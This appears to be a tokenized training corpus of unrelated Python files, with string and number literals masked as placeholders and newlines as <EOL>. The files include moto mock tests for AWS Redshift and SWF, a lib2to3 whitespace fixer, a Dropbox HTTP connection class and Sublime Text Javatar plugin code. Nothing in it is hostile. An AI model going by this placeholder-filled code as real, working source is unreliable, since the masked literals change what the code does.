describe_cluster_subnet_groups ( ) <EOL> subnets = subnets_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> subnets . should . have . length_of ( <NUM_LIT:1> ) <EOL> redshift_conn . delete_cluster_subnet_group ( "<STR_LIT>" ) <EOL> subnets_response = redshift_conn . describe_cluster_subnet_groups ( ) <EOL> subnets = subnets_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> subnets . should . have . 
length_of ( <NUM_LIT:0> ) <EOL> redshift_conn . delete_cluster_subnet_group . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterSubnetGroupNotFound ) <EOL> @ mock_redshift <EOL> def test_create_cluster_security_group ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> conn . create_cluster_security_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> groups_response = conn . describe_cluster_security_groups ( "<STR_LIT>" ) <EOL> my_group = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> my_group [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> my_group [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> list ( my_group [ '<STR_LIT>' ] ) . should . equal ( [ ] ) <EOL> @ mock_redshift <EOL> def test_describe_non_existant_security_group ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> conn . describe_cluster_security_groups . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterSecurityGroupNotFound ) <EOL> @ mock_redshift <EOL> def test_delete_cluster_security_group ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> conn . create_cluster_security_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> groups_response = conn . describe_cluster_security_groups ( ) <EOL> groups = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> groups . should . have . length_of ( <NUM_LIT:2> ) <EOL> conn . delete_cluster_security_group ( "<STR_LIT>" ) <EOL> groups_response = conn . describe_cluster_security_groups ( ) <EOL> groups = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> groups . should . have . length_of ( <NUM_LIT:1> ) <EOL> conn . delete_cluster_security_group . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterSecurityGroupNotFound ) <EOL> @ mock_redshift <EOL> def test_create_cluster_parameter_group ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> conn . 
create_cluster_parameter_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> groups_response = conn . describe_cluster_parameter_groups ( "<STR_LIT>" ) <EOL> my_group = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> my_group [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> my_group [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> my_group [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> @ mock_redshift <EOL> def test_describe_non_existant_parameter_group ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> conn . describe_cluster_parameter_groups . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterParameterGroupNotFound ) <EOL> @ mock_redshift <EOL> def test_delete_cluster_parameter_group ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> conn . create_cluster_parameter_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> groups_response = conn . describe_cluster_parameter_groups ( ) <EOL> groups = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> groups . should . have . length_of ( <NUM_LIT:2> ) <EOL> conn . delete_cluster_parameter_group ( "<STR_LIT>" ) <EOL> groups_response = conn . describe_cluster_parameter_groups ( ) <EOL> groups = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> groups . should . have . length_of ( <NUM_LIT:1> ) <EOL> conn . delete_cluster_parameter_group . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterParameterGroupNotFound ) </s>
<s> from freezegun import freeze_time <EOL> from moto . swf . exceptions import SWFWorkflowExecutionClosedError <EOL> from moto . swf . models import ( <EOL> ActivityTask , <EOL> ActivityType , <EOL> Timeout , <EOL> ) <EOL> from . . utils import ( <EOL> ACTIVITY_TASK_TIMEOUTS , <EOL> make_workflow_execution , <EOL> process_first_timeout , <EOL> ) <EOL> def test_activity_task_creation ( ) : <EOL> wfe = make_workflow_execution ( ) <EOL> task = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = "<STR_LIT:foo>" , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> workflow_execution = wfe , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> ) <EOL> task . workflow_execution . should . equal ( wfe ) <EOL> task . state . should . equal ( "<STR_LIT>" ) <EOL> task . task_token . should_not . be . empty <EOL> task . started_event_id . should . be . none <EOL> task . start ( <NUM_LIT> ) <EOL> task . state . should . equal ( "<STR_LIT>" ) <EOL> task . started_event_id . should . equal ( <NUM_LIT> ) <EOL> task . complete ( ) <EOL> task . state . should . equal ( "<STR_LIT>" ) <EOL> task . fail ( ) <EOL> task . state . should . equal ( "<STR_LIT>" ) <EOL> def test_activity_task_full_dict_representation ( ) : <EOL> wfe = make_workflow_execution ( ) <EOL> at = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = ActivityType ( "<STR_LIT:foo>" , "<STR_LIT>" ) , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> workflow_execution = wfe , <EOL> ) <EOL> at . start ( <NUM_LIT> ) <EOL> fd = at . to_full_dict ( ) <EOL> fd [ "<STR_LIT>" ] . should . equal ( "<STR_LIT>" ) <EOL> fd [ "<STR_LIT>" ] [ "<STR_LIT:version>" ] . should . equal ( "<STR_LIT>" ) <EOL> fd [ "<STR_LIT:input>" ] . should . equal ( "<STR_LIT>" ) <EOL> fd [ "<STR_LIT>" ] . should . equal ( <NUM_LIT> ) <EOL> fd . should . contain ( "<STR_LIT>" ) <EOL> fd [ "<STR_LIT>" ] . should . equal ( wfe . 
to_short_dict ( ) ) <EOL> at . start ( <NUM_LIT> ) <EOL> fd = at . to_full_dict ( ) <EOL> fd [ "<STR_LIT>" ] . should . equal ( <NUM_LIT> ) <EOL> def test_activity_task_reset_heartbeat_clock ( ) : <EOL> wfe = make_workflow_execution ( ) <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = "<STR_LIT:foo>" , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> workflow_execution = wfe , <EOL> ) <EOL> task . last_heartbeat_timestamp . should . equal ( <NUM_LIT> ) <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task . reset_heartbeat_clock ( ) <EOL> task . last_heartbeat_timestamp . should . equal ( <NUM_LIT> ) <EOL> def test_activity_task_first_timeout ( ) : <EOL> wfe = make_workflow_execution ( ) <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = "<STR_LIT:foo>" , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> workflow_execution = wfe , <EOL> ) <EOL> task . first_timeout ( ) . should . be . none <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task . first_timeout ( ) . should . be . a ( Timeout ) <EOL> process_first_timeout ( task ) <EOL> task . state . should . equal ( "<STR_LIT>" ) <EOL> task . timeout_type . should . equal ( "<STR_LIT>" ) <EOL> def test_activity_task_cannot_timeout_on_closed_workflow_execution ( ) : <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> wfe = make_workflow_execution ( ) <EOL> wfe . start ( ) <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = "<STR_LIT:foo>" , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> workflow_execution = wfe , <EOL> ) <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task . first_timeout ( ) . should . be . 
a ( Timeout ) <EOL> wfe . first_timeout ( ) . should . be . a ( Timeout ) <EOL> process_first_timeout ( wfe ) <EOL> task . first_timeout ( ) . should . be . none <EOL> def test_activity_task_cannot_change_state_on_closed_workflow_execution ( ) : <EOL> wfe = make_workflow_execution ( ) <EOL> wfe . start ( ) <EOL> task = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = "<STR_LIT:foo>" , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> workflow_execution = wfe , <EOL> ) <EOL> wfe . complete ( <NUM_LIT> ) <EOL> task . timeout . when . called_with ( Timeout ( task , <NUM_LIT:0> , "<STR_LIT:foo>" ) ) . should . throw ( SWFWorkflowExecutionClosedError ) <EOL> task . complete . when . called_with ( ) . should . throw ( SWFWorkflowExecutionClosedError ) <EOL> task . fail . when . called_with ( ) . should . throw ( SWFWorkflowExecutionClosedError ) </s>
<s> from __future__ import unicode_literals <EOL> from lib2to3 . fixer_base import BaseFix <EOL> from lib2to3 . pgen2 import token <EOL> class FixTrailingWhitespace ( BaseFix ) : <EOL> '''<STR_LIT>''' <EOL> def match ( self , node ) : <EOL> if node . type == token . NEWLINE or node . prefix . count ( '<STR_LIT:\n>' ) : <EOL> return True <EOL> def transform ( self , node , results ) : <EOL> if node . prefix . count ( '<STR_LIT:#>' ) : <EOL> prefix_split = node . prefix . split ( '<STR_LIT:\n>' ) <EOL> new_prefix = '<STR_LIT:\n>' . join ( [ line . rstrip ( '<STR_LIT>' ) for line in <EOL> prefix_split [ : - <NUM_LIT:1> ] ] + [ prefix_split [ - <NUM_LIT:1> ] ] ) <EOL> else : <EOL> new_prefix = node . prefix . lstrip ( '<STR_LIT>' ) <EOL> if new_prefix [ <NUM_LIT:0> : <NUM_LIT:1> ] == '<STR_LIT:\\>' : <EOL> new_prefix = "<STR_LIT>" % new_prefix <EOL> if node . prefix != new_prefix : <EOL> node . prefix = new_prefix <EOL> node . changed ( ) </s>
<s> class MyClass : <EOL> def my_func ( self ) : <EOL> if self . xxxx : <EOL> self . xxxx ( ) <EOL> self . ping ( ) <EOL> def emptyline ( self ) : <EOL> return </s>
<s> def x ( ) : <EOL> return item , <EOL> after = <NUM_LIT:1> </s>
<s> from zester import MultipleClient , Attribute <EOL> class HNClient ( MultipleClient ) : <EOL> url = "<STR_LIT>" <EOL> title = Attribute ( selector = "<STR_LIT>" , modifier = "<STR_LIT>" ) <EOL> link = Attribute ( selector = "<STR_LIT>" , modifier = "<STR_LIT>" ) <EOL> points = Attribute ( selector = "<STR_LIT>" , <EOL> modifier = "<STR_LIT>" ) </s>
<s> import json <EOL> import socket <EOL> from . . urllib3 import * <EOL> from . dropbox_util import * <EOL> class DropboxConnection ( ) : <EOL> def request ( self , method , url , params = None , body = None , headers = None , raw_response = False ) : <EOL> try : <EOL> import ssl <EOL> pool_manager = PoolManager ( <EOL> num_pools = <NUM_LIT:4> , <EOL> maxsize = <NUM_LIT:8> , <EOL> block = False , <EOL> timeout = <NUM_LIT> , <EOL> cert_reqs = ssl . CERT_REQUIRED , <EOL> ca_certs = DropboxUtil . get_cert_file ( ) , <EOL> ssl_version = ssl . PROTOCOL_TLSv1 , <EOL> ) <EOL> except ( ImportError ) : <EOL> pool_manager = PoolManager ( <EOL> num_pools = <NUM_LIT:4> , <EOL> maxsize = <NUM_LIT:8> , <EOL> block = False , <EOL> timeout = <NUM_LIT> , <EOL> ) <EOL> params = params or { } <EOL> headers = headers or { } <EOL> headers [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> if params : <EOL> if body : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> body = urllib . parse . urlencode ( params ) <EOL> headers [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> if hasattr ( body , "<STR_LIT>" ) : <EOL> body = str ( body . getvalue ( ) ) <EOL> headers [ "<STR_LIT>" ] = len ( body ) <EOL> for key , value in headers . items ( ) : <EOL> if type ( value ) == str and "<STR_LIT:\n>" in value : <EOL> raise ValueError ( "<STR_LIT>" + key + "<STR_LIT>" + value + "<STR_LIT:)>" ) <EOL> try : <EOL> response = pool_manager . urlopen ( method = method , url = url , body = body , headers = headers , preload_content = False ) <EOL> except socket . error as e : <EOL> raise SocketError ( url , e ) <EOL> except exceptions . SSLError as e : <EOL> raise SocketError ( url , "<STR_LIT>" % e ) <EOL> if response . status != <NUM_LIT:200> : <EOL> raise ErrorResponse ( response , response . read ( ) ) <EOL> return self . process_response ( response , raw_response ) <EOL> def process_response ( self , r , raw_response ) : <EOL> if raw_response : <EOL> return r <EOL> else : <EOL> resp = json . loads ( r . read ( ) . 
decode ( "<STR_LIT:utf-8>" ) ) <EOL> r . close ( ) <EOL> return resp <EOL> def get ( self , url , headers = None , raw_response = False ) : <EOL> return self . request ( "<STR_LIT:GET>" , url , headers = headers , raw_response = raw_response ) <EOL> def post ( self , url , params = None , headers = None , raw_response = False ) : <EOL> if params is None : <EOL> params = { } <EOL> return self . request ( "<STR_LIT:POST>" , url , params = params , headers = headers , raw_response = raw_response ) <EOL> def put ( self , url , body , headers = None , raw_response = False ) : <EOL> return self . request ( "<STR_LIT>" , url , body = body , headers = headers , raw_response = raw_response ) <EOL> class SocketError ( socket . error ) : <EOL> def __init__ ( self , host , e ) : <EOL> msg = "<STR_LIT>" % ( host , str ( e ) ) <EOL> socket . error . __init__ ( self , msg ) <EOL> class ErrorResponse ( Exception ) : <EOL> def __init__ ( self , http_resp , body ) : <EOL> self . status = http_resp . status <EOL> self . reason = http_resp . reason <EOL> self . body = body <EOL> self . headers = http_resp . getheaders ( ) <EOL> http_resp . close ( ) <EOL> try : <EOL> self . body = json . loads ( self . body . decode ( "<STR_LIT:utf-8>" ) ) <EOL> self . error_msg = self . body . get ( '<STR_LIT:error>' ) <EOL> self . user_error_msg = self . body . get ( '<STR_LIT>' ) <EOL> except ValueError : <EOL> self . error_msg = None <EOL> self . user_error_msg = None <EOL> def __str__ ( self ) : <EOL> if self . user_error_msg and self . user_error_msg != self . error_msg : <EOL> msg = "<STR_LIT>" % ( self . user_error_msg , self . error_msg ) <EOL> elif self . error_msg : <EOL> msg = repr ( self . error_msg ) <EOL> elif not self . body : <EOL> msg = repr ( self . reason ) <EOL> else : <EOL> msg = "<STR_LIT>" + "<STR_LIT>" % ( self . body , self . headers ) <EOL> return "<STR_LIT>" % ( self . status , msg ) </s>
<s> import sublime <EOL> import sublime_plugin <EOL> import os . path <EOL> from ... core import Settings , StateProperty <EOL> from ... utils import ( <EOL> ActionHistory , <EOL> Constant <EOL> ) <EOL> REPORT_TEMPLATE = '''<STR_LIT>''' <EOL> class JavatarActionHistoryCommand ( sublime_plugin . WindowCommand ) : <EOL> """<STR_LIT>""" <EOL> def get_actions ( self , selector ) : <EOL> selectors = selector . split ( "<STR_LIT:|>" ) <EOL> include = selectors . pop ( <NUM_LIT:0> ) . split ( "<STR_LIT:U+002C>" ) <EOL> exclude = selectors [ <NUM_LIT:0> ] . split ( "<STR_LIT:U+002C>" ) if selectors else [ ] <EOL> return ActionHistory ( ) . get_action ( include , exclude ) <EOL> def print_action_history ( self , selector ) : <EOL> """<STR_LIT>""" <EOL> selector = selector or "<STR_LIT>" <EOL> actions = self . get_actions ( selector ) <EOL> actionText = "<STR_LIT:\n>" . join ( <EOL> "<STR_LIT>" . format ( i , action ) <EOL> for i , action in enumerate ( actions , <NUM_LIT:1> ) <EOL> ) <EOL> report = REPORT_TEMPLATE . format_map ( { <EOL> "<STR_LIT>" : Constant . get_version ( ) , <EOL> "<STR_LIT>" : os . path . exists ( os . path . join ( <EOL> sublime . installed_packages_path ( ) , "<STR_LIT>" ) <EOL> ) , <EOL> "<STR_LIT>" : __name__ . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" : sublime . version ( ) , <EOL> "<STR_LIT>" : sublime . channel ( ) , <EOL> "<STR_LIT>" : Settings ( ) . get ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( os . path . exists ( <EOL> os . path . join ( sublime . packages_path ( ) , "<STR_LIT>" ) <EOL> ) or os . path . exists ( os . path . join ( <EOL> sublime . installed_packages_path ( ) , <EOL> "<STR_LIT>" <EOL> ) ) ) , <EOL> "<STR_LIT>" : StateProperty ( ) . is_project ( ) , <EOL> "<STR_LIT>" : StateProperty ( ) . is_file ( ) , <EOL> "<STR_LIT>" : StateProperty ( ) . is_java ( ) , <EOL> "<STR_LIT>" : sublime . packages_path ( ) , <EOL> "<STR_LIT>" : sublime . platform ( ) , <EOL> "<STR_LIT>" : sublime . 
arch ( ) , <EOL> "<STR_LIT>" : actionText , <EOL> } ) <EOL> view = self . window . new_file ( ) <EOL> view . set_name ( "<STR_LIT>" ) <EOL> view . set_scratch ( True ) <EOL> view . run_command ( "<STR_LIT>" , { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : report , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } ) <EOL> view . run_command ( "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> def run ( self , selector = None ) : <EOL> """<STR_LIT>""" <EOL> if not Settings ( ) . get ( "<STR_LIT>" ) : <EOL> sublime . message_dialog ( <EOL> "<STR_LIT>" <EOL> ) <EOL> return <EOL> if selector is None : <EOL> self . window . show_input_panel ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> self . print_action_history , <EOL> None , <EOL> None <EOL> ) <EOL> return <EOL> self . print_action_history ( "<STR_LIT>" ) </s>
<s> import sublime <EOL> import os <EOL> import time <EOL> from . settings import Settings <EOL> class _StateProperty : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def instance ( cls ) : <EOL> if not hasattr ( cls , "<STR_LIT>" ) : <EOL> cls . _instance = cls ( ) <EOL> return cls . _instance <EOL> def is_project ( self , window = None ) : <EOL> """<STR_LIT>""" <EOL> window = window or sublime . active_window ( ) <EOL> if window : <EOL> return len ( window . folders ( ) ) > <NUM_LIT:0> <EOL> return False <EOL> def is_file ( self , view = None ) : <EOL> """<STR_LIT>""" <EOL> return self . get_file ( view ) is not None <EOL> def is_java ( self , file_path = None , view = None ) : <EOL> """<STR_LIT>""" <EOL> if not file_path and not view : <EOL> view = sublime . active_window ( ) . active_view ( ) <EOL> if view . file_name ( ) : <EOL> return ( <EOL> self . is_file ( view ) and <EOL> self . is_java ( file_path = view . file_name ( ) ) <EOL> ) <EOL> elif file_path : <EOL> _ , ext = os . path . splitext ( os . path . basename ( file_path ) ) <EOL> return ext in Settings ( ) . get ( "<STR_LIT>" ) <EOL> return ( <EOL> view and <EOL> view . find_by_selector ( Settings ( ) . get ( "<STR_LIT>" ) ) <EOL> ) <EOL> def is_source_folder ( self , path , can_empty = True ) : <EOL> """<STR_LIT>""" <EOL> empty = True <EOL> for name in os . listdir ( path ) : <EOL> empty = False <EOL> path_name = os . path . join ( path , name ) <EOL> if can_empty : <EOL> if os . path . isdir ( path_name ) : <EOL> if self . is_source_folder ( path_name , can_empty ) : <EOL> return True <EOL> if os . path . isfile ( path_name ) and self . is_java ( path_name ) : <EOL> return True <EOL> return can_empty and empty <EOL> def load_cache ( self ) : <EOL> from . macro import Macro <EOL> from . . utils import Utils <EOL> cache_location = Macro ( ) . parse ( Settings ( ) . get ( <EOL> "<STR_LIT>" <EOL> ) ) <EOL> cache_path = os . path . join ( cache_location , "<STR_LIT>" ) <EOL> if os . path . 
exists ( cache_path ) : <EOL> cache_file = open ( cache_path , "<STR_LIT:r>" ) <EOL> cache = sublime . decode_value ( cache_file . read ( ) ) <EOL> cache_file . close ( ) <EOL> if "<STR_LIT>" in cache : <EOL> valid_time = time . time ( ) - Utils . time_from_string ( <EOL> Settings ( ) . get ( "<STR_LIT>" ) <EOL> ) <EOL> if cache [ "<STR_LIT>" ] < valid_time : <EOL> return { } <EOL> return cache <EOL> else : <EOL> return { } <EOL> def save_cache ( self , cache ) : <EOL> if "<STR_LIT>" not in cache : <EOL> cache [ "<STR_LIT>" ] = int ( time . time ( ) ) <EOL> from . macro import Macro <EOL> cache_location = Macro ( ) . parse ( Settings ( ) . get ( <EOL> "<STR_LIT>" <EOL> ) ) <EOL> cache_path = os . path . join ( cache_location , "<STR_LIT>" ) <EOL> if os . path . exists ( cache_path ) : <EOL> os . remove ( cache_path ) <EOL> cache_file = open ( cache_path , "<STR_LIT:w>" ) <EOL> cache_file . write ( sublime . encode_value ( cache , True ) ) <EOL> cache_file . close ( ) <EOL> def get_file ( self , view = None ) : <EOL> """<STR_LIT>""" <EOL> view = view or sublime . active_window ( ) . active_view ( ) <EOL> if view : <EOL> return view . file_name ( ) <EOL> return None <EOL> def get_project_dirs ( self , window = None , file_path = None ) : <EOL> """<STR_LIT>""" <EOL> window = window or sublime . active_window ( ) <EOL> if window : <EOL> return window . folders ( ) <EOL> return [ self . get_dir ( file_path = file_path ) ] <EOL> def get_source_folders ( self , file_path = None , as_tuple = False , <EOL> include_missing = False ) : <EOL> """<STR_LIT>""" <EOL> source_folders = [ <EOL> source_folder <EOL> for source_folder in Settings ( ) . get ( "<STR_LIT>" , [ ] ) <EOL> if os . path . exists ( source_folder ) or include_missing <EOL> ] <EOL> if as_tuple : <EOL> if source_folders : <EOL> return ( source_folders , True ) <EOL> else : <EOL> return ( self . get_project_dirs ( file_path = file_path ) , False ) <EOL> else : <EOL> return ( <EOL> source_folders or <EOL> self . 
get_project_dirs ( file_path = file_path ) <EOL> ) <EOL> def get_source_folder ( self , file_path = None ) : <EOL> """<STR_LIT>""" <EOL> file_path = file_path or self . get_file ( ) <EOL> from . . utils import Utils <EOL> if self . is_project ( ) : <EOL> source_folders = self . get_source_folders ( file_path = file_path ) <EOL> if source_folders : <EOL> if not file_path : <EOL> return source_folders [ <NUM_LIT:0> ] <EOL> for source_folder in source_folders : <EOL> if Utils . contains_file ( source_folder , file_path ) : <EOL> return source_folder <EOL> if self . get_dir ( file_path = file_path ) : <EOL> return self . get_dir ( file_path = file_path ) <EOL> return None <EOL> def get_root_dir ( self , file_path = None , view = None ) : <EOL> """<STR_LIT>""" <EOL> if self . is_project ( ) : <EOL> project_folders = self . get_project_dirs ( file_path = file_path ) <EOL> if project_folders : <EOL> return project_folders [ <NUM_LIT:0> ] <EOL> if self . get_dir ( ) : <EOL> return self . get_dir ( file_path = file_path , view = view ) <EOL> return None <EOL> def get_dir ( self , file_path = None , view = None ) : <EOL> """<STR_LIT>""" <EOL> file_path = file_path or self . get_file ( view ) <EOL> if file_path : <EOL> return os . path . dirname ( file_path ) <EOL> return None <EOL> def get_library_paths ( self , from_global = False , include_missing = False ) : <EOL> """<STR_LIT>""" <EOL> out_library_paths = [ ] <EOL> library_paths = Settings ( ) . get ( <EOL> "<STR_LIT>" , from_global = from_global <EOL> ) <EOL> if library_paths is not None : <EOL> out_library_paths . extend ( <EOL> [ library_path , from_global ] <EOL> for library_path in library_paths <EOL> if os . path . exists ( library_path ) or include_missing <EOL> ) <EOL> if not from_global : <EOL> out_library_paths . extend ( <EOL> [ library_path , True ] <EOL> for library_path in Settings ( ) . get ( <EOL> "<STR_LIT>" , default = [ ] , from_global = True <EOL> ) <EOL> if os . path . 
exists ( library_path ) or include_missing <EOL> ) <EOL> return out_library_paths <EOL> def refresh_library_paths ( self , from_global = None ) : <EOL> if from_global is None : <EOL> self . refresh_library_paths ( True ) <EOL> self . refresh_library_paths ( False ) <EOL> return <EOL> previous_menu = "<STR_LIT>" if from_global else "<STR_LIT>" <EOL> library_paths_menu = { <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : [ <EOL> [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> ] , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:name>" : previous_menu <EOL> } , { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : from_global <EOL> } <EOL> } <EOL> ] <EOL> } <EOL> library_paths = self . get_library_paths ( from_global , True ) <EOL> for library_path in library_paths : <EOL> name = os . path . basename ( library_path [ <NUM_LIT:0> ] ) <EOL> if library_path [ <NUM_LIT:1> ] : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : library_path [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" : True <EOL> } <EOL> } <EOL> ) <EOL> if not os . path . exists ( library_path [ <NUM_LIT:0> ] ) : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> elif os . path . isdir ( library_path [ <NUM_LIT:0> ] ) : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> "<STR_LIT:[>" + name + "<STR_LIT:]>" , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> else : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> name , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> else : <EOL> library_paths_menu [ "<STR_LIT>" ] . 
append ( <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : library_path [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" : False <EOL> } <EOL> } <EOL> ) <EOL> if not os . path . exists ( library_path [ <NUM_LIT:0> ] ) : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> elif os . path . isdir ( library_path [ <NUM_LIT:0> ] ) : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> "<STR_LIT:[>" + name + "<STR_LIT:]>" , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> else : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> name , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> menu_name = "<STR_LIT>" <EOL> if from_global : <EOL> menu_name = "<STR_LIT>" + menu_name <EOL> else : <EOL> menu_name = "<STR_LIT>" + menu_name <EOL> sublime . active_window ( ) . run_command ( "<STR_LIT>" , { "<STR_LIT>" : { <EOL> "<STR_LIT:name>" : menu_name , <EOL> "<STR_LIT>" : library_paths_menu <EOL> } } ) <EOL> def refresh_source_folders ( self ) : <EOL> """<STR_LIT>""" <EOL> source_folder_menu = { <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : [ <EOL> [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> ] , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:name>" : "<STR_LIT>" <EOL> } , { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> ] <EOL> } <EOL> source_folders , from_settings = self . get_source_folders ( <EOL> as_tuple = True , include_missing = True <EOL> ) <EOL> for source_folder in source_folders : <EOL> name = os . path . basename ( source_folder ) <EOL> source_folder_menu [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : source_folder <EOL> } <EOL> } ) <EOL> source_folder_menu [ "<STR_LIT>" ] . append ( [ <EOL> ( <EOL> "<STR_LIT>" if not os . path . 
exists ( source_folder ) else "<STR_LIT>" <EOL> ) + name , <EOL> ( <EOL> "<STR_LIT>" <EOL> if from_settings <EOL> else "<STR_LIT>" + <EOL> "<STR_LIT>" <EOL> ) <EOL> ] ) <EOL> sublime . active_window ( ) . run_command ( "<STR_LIT>" , { "<STR_LIT>" : { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : source_folder_menu <EOL> } } ) <EOL> def StateProperty ( ) : <EOL> return _StateProperty . instance ( ) </s>
